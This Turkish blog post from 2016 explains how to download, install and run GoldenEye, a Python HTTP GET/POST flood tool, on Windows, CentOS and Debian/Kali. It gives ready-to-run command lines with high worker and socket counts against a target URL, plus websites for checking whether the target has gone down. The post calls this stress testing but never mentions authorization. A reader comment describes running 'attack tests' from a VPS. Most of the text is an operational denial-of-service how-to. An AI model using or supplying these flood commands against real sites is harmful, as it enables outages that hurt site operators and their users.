9 Ocak 2016

DDoS Test Aracı GoldenEye Layer 7 Amplification


GoldenEye Layer 7 DoS güvenlik testi yazılımıdır. HTTP Get ve Post istekleri ile DoS Stress Testing için kullanılır. HTTP Flood saldırısı olarak da bilinir. HTTP Get/Post için en çok kullanılan GoldenEye Layer 7 yazılımını bu makalede inceleyeceğiz.

Program: GoldenEye
Açıklama: HTTP D/DDoS Stress Testing HTTP Keep Alive + NoCache
Protokol: Layer 7 Application Layer
Code: Python
Developer: Jan Seidl (jseidl[at]wroot.org)

GoldenEye Kaynaklar
github.com/jseidl/GoldenEye (Önerilen)
github.com/jseidl/GoldenEye-Mobile (GoldenEye Mobil Versiyon)
www.useragentstring.com (User Agent String)

Ön Bilgiler
-w, --workers: Eş zamanlı yapılan Process(çalışan sayısı) (Örnek: -w 100)
-s, --sockets: Eş zamanlı test edilecek Sockets sayısı. (Örnek: -s 100)
-m, --method: HTTP saldırı yöntemleri (get,post,random) (Örnek: -m get)
-d, --debug : Hata ayıklama modu etkinleştirmek içindir.

Testi bitirmek için CTRL+C demeniz yeterlidir. Workers yani eş zamanlı arka planda yapılacak işlemdir. En fazla 100 değerini almaktadır.

Python Kurulumu (Windows/Kali Linux/CentOS/Linux/Android)

1) Windows üzerinde GoldenEye kullanımı

GoldenEye klasörünü C:\Python27 dizini içerisine atın. Başlat Çalıştır'dan (cmd) yazarak komut satırını açalım.

GoldenEye klasörüne gelelim;
# cd C:\Python27\GoldenEye

Kullanım yönergesi için;
# goldeneye.py -h

Test komutu;
# goldeneye.py http://www.testdomain.com/

Örnek test çeşitleri;
# goldeneye.py http://www.testdomain.com/ -w 10 -s 10 -m random
# goldeneye.py http://www.testdomain.com/ -w 20 -s 200 -m random

2) CentOS(Sunucu) üzerinde GoldenEye kullanımı

DoS-DDoS Test Aracı: GoldenEye

Sunucu Güncelleme;
# yum -y update
yum -y install epel-release

CentOS / RHEL 7 Python ve Development Tools;
# yum -y group install "Development Tools"

GoldenEye Script dosyasını sunucuya çekelim;
# wget https://github.com/jseidl/GoldenEye/archive/master.zip
# unzip master.zip
# mv GoldenEye-master GoldenEye

GoldenEye klasörüne gelin;
# cd GoldenEye

Gerekli ayarlar ve kullanım;
# chmod +x goldeneye.py
# python ./goldeneye.py

Örnek test çeşitleri;
# ./goldeneye.py http://www.testdomain.com/
# ./goldeneye.py http://www.testdomain.com/ -w 10 -s 10 -m random
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 1000 -m get -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m random -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m post -d


DoS-DDoS Test Aracı: GoldenEye

3) Debian, Ubuntu(Sunucu) ve Kali Linux üzerinde GoldenEye kullanımı

Debian üzerinde Python kurulumu ve kullanımı daha basit olduğu için stres testlerini Debian sunucu üzerinde yapmanızı öneririm.

İlk olarak Debian güncelleme ve Python kurulumlarını kısaca yapalım;
# apt-get update
# apt-get install python

Python kontrolü ve versiyonu öğrenmek için;
# python --version

Sonra GoldenEye klasörünü ana dizine attıktan sonra dizin içine girelim ve yetki verelim;
# cd GoldenEye
# chmod +x goldeneye.py

HTTP Get Flood D/DoS güvenlik testi ile direk başlayalım;
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 1000 -m get -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m random -d
# ./goldeneye.py http://www.testdomain.com/ -w 100 -s 5000 -m post -d

Anlık Test Sonuçları
Anlık test sonuçları için aşağıdaki siteleri ve yöntemleri kullanabilirsiniz;

1) Down Up Time ile siteyi kontol edebilirsiniz: www.downuptime.net

2) Check Host ile siteyi kontrol edebilirsiniz: www.check-host.net

3) Google Chrome'da Ctrl+Shift+N yaparak gizli moda geçerek siteyi açmayı deneyebilirsiniz.

1 yorum:

  1. Hocam merhaba bu scripti kurdum.Linux vps centos x86 64 bit kullanıyorum atak testi yapıyorum başarılı oluyor birkaç dakika sonra shutdown goldeneye olarak script kendi kendine duruyor tam olarak çözemedim nedendir acaba

    YanıtlaSil